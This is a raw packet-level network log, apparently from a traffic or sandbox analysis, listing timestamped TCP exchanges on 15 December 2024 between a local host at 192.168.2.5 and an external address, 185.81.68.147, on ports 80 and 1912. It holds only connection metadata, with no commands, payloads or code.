                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.395015001 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.395996094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.396101952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.396554947 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.397195101 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.397212029 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.397291899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.398478031 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.398495913 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.398693085 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.399410963 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.399550915 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400192976 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400671005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400778055 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.400899887 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.401861906 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.402013063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.402241945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.403001070 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.403017044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.403089046 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.404182911 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.404198885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.404417992 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.405380964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.405397892 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.405517101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.406414986 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.406621933 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.406725883 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.407665968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.407681942 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.407768011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.408714056 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.408837080 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.409395933 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.409987926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.410006046 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.410104990 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.411201954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.411217928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.411380053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.412359953 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.412398100 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.412503958 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.413495064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.413511992 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.413695097 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.414653063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.414669991 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.414743900 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.415802002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.415937901 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.416023016 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.417045116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.417061090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.417117119 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.418150902 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.418168068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.418242931 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.419624090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.419691086 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.419770002 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.420825958 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.421101093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.422120094 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.422135115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.422204971 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.422205925 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.423361063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.423377037 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.423609972 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.424649954 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.424665928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.424751997 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.426063061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.426145077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.426363945 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.427129030 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.427639961 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.427747011 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.428427935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.429027081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.429126024 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.429389000 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.429444075 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.429596901 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.430210114 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.430352926 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.430453062 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.430979967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.431096077 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.431193113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.432058096 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.432208061 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.432298899 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.433165073 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.433536053 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.433898926 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.434323072 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.434357882 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.434457064 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.435446024 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.435555935 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.435638905 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.436630011 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.436682940 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.436790943 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.437974930 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.438010931 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.438061953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.439043045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.439078093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.439156055 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.440505028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.489489079 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.497701883 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.497900963 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.498023987 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.501816988 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.501945019 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.502062082 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.510595083 CET191249709185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.551974058 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.560307026 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.571708918 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.571744919 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.571847916 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.572307110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.572443962 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.572526932 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.573398113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.573431969 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.573550940 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.574542999 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.574668884 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.574774981 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.575800896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.575838089 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.575918913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.576857090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.576972008 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.577049017 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.578078985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.578196049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.578295946 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.579190016 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.579389095 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.579476118 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.580319881 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.580533028 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.580610037 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.581501007 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.581557035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.581638098 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.582648039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.582762003 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.582839966 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.583786964 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.583914995 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.584011078 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.584966898 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.585344076 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.585434914 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.586255074 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.586288929 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.586366892 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.587376118 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.587743998 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.587833881 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.592892885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593059063 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593095064 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593132973 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593172073 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593209028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593269110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593346119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593379021 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593405008 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593414068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593537092 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593564987 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593573093 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.593790054 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.594290018 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.594322920 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.594535112 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.595411062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.595565081 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.595966101 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.596590042 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.596642017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.597899914 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.597933054 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.597961903 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.598362923 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.599039078 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.599150896 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.599307060 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.600064039 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.600186110 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.600428104 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.601289988 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.601401091 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.602197886 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.602586985 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.602694035 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.602966070 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.603908062 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.603940010 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.604321003 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.604801893 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.605092049 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.605377913 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.606100082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.606132984 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.608993053 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:18.864445925 CET497091912192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077363014 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077435017 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077512980 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077538967 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077579975 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077613115 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077641964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077667952 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077721119 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077755928 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077784061 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077789068 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077824116 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077852964 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077858925 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077887058 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077893019 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077927113 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077960968 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077986956 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.077997923 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078300953 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078495026 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078547001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078576088 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078583956 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078618050 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078644991 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078650951 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078685045 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078711033 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078717947 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078751087 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078778028 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078783989 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078823090 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.078968048 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079376936 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079430103 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079463005 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079497099 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079507113 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079530001 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079533100 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079566002 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079598904 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079624891 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079632044 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079664946 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079670906 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079699993 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.079725027 CET4970880192.168.2.5185.81.68.147
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080310106 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080362082 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080394983 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080427885 CET8049708185.81.68.147192.168.2.5
                                                                                                                                                                                                                        Dec 15, 2024 09:12:19.080457926 CET4970880192.168.2.5185.81.68.147
